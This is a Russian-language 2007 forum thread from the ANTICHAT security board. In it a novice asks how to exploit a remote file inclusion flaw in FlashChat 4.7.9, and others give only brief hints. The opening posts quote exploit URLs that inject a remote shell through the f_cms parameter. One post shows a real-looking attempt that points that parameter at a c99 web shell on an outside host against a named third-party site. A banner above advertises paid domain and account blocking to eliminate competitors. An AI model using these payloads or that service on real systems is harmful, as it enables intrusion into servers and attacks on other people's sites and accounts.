УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, сейчас доступен на antichat.xyz.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
Есть уязвимость в FlashChat v 4.7.9. Как использовать?

Опции темы

Поиск в этой теме

Опции просмотра

Есть уязвимость в FlashChat v 4.7.9. Как использовать?

12.10.2007, 10:24

Nefix

Новичок

Регистрация: 09.07.2007

Сообщений: 3

Провел на форуме:
30138

Репутация: 0

Есть уязвимость в FlashChat v 4.7.9. Как использовать?

Script : FlashChat v4.7.9
Download : files.filefront.com/FlashChat+v479rar/;7192354;/fileinfo.html
--------------------------
B.Files :
connection.php >Require_once($f_cms);
common.php > Require_once($f_cms);
--------------------------
Exploits :
http://www.example.com/chat/incclasses/connection.php?f_cms=[Shell-Attack]
http://www.example.com/chat/inc/common.php?f_cms=[Shell-Attack]
-------------------------

Как я понимаю вместо [Shell-Attack] нужно вставить ссылку на шелл и он должен загрузиться на сайт с установленным чатом, но ничего не получается((( объясните плиз что я неправильно делаю... и как этой уязвимостью пользоваться

12.10.2007, 12:19

.Slip

Leaders of Antichat - Level 4

Регистрация: 16.01.2006

Сообщений: 1,966

Провел на форуме:
21768337

Репутация: 3486

Цитата:

Сообщение от Nefix

Лучше скинь ссылку, я не могу понять что у тебя не получается. А то ты просто переписал багтрак.

12.10.2007, 16:48

Nefix

Новичок

Регистрация: 09.07.2007

Сообщений: 3

Провел на форуме:
30138

Репутация: 0

ну допустим чат здесь: http://www.pesleague.com/forum/chat/flashchat.php
шелл здесь: http://burny.fromru.com/c99madshell.php

итоге получается http://www.pesleague.com/forum/chat/incclasses/connection.php?f_cms=http://burny.fromru.com/c99madshell.php
и как я понял получившаяся ссылка должна запустить шелл на pc-center.com.ua... но ничего не получается

или я все неправильно делаю и не так понял?

Последний раз редактировалось Nefix; 12.10.2007 в 17:05..

15.10.2007, 11:33

Nefix

Новичок

Регистрация: 09.07.2007

Сообщений: 3

Провел на форуме:
30138

Репутация: 0

15.10.2007, 11:57

Rebz

Super Moderator

Регистрация: 08.11.2004

Сообщений: 3,395

Провел на форуме:
13166814

Репутация: 3876

Nefix,
а ты зайди по адресу h__p://www.pesleague.com/forum/chat/incclasses/connection.php и сам думаю догадаешься..

15.10.2007, 15:25

Nightmarе

Познавший АНТИЧАТ

Регистрация: 29.04.2007

Сообщений: 1,189

Провел на форуме:
5749763

Репутация: 1680

Отправить сообщение для Nightmarе с помощью ICQ

действительно объясните как юзать баги

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Среди людей мы иные, но даже среди иных мы остаёмся людьми	MorpheuS	Авторские статьи	34	16.06.2010 02:57
Документация по airodump-ng, aircrack-ng, airserv-ng, Aireplay-ng.	Elvis000	Беспроводные технологии/WPAN/WLAN	4	31.10.2009 18:58
Faq о открытии некоторых моделей домофонов	Vanterlog	Статьи	12	10.06.2009 20:39
FAQ. Перед тем как задать вопрос.	Fata1ex	ICQ	1	04.11.2007 20:35
Как использовать уязвимость в usercp_avatar.php в phpBB 2.0.11/20	Kitj@rik	Форумы	0	11.06.2006 12:10

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход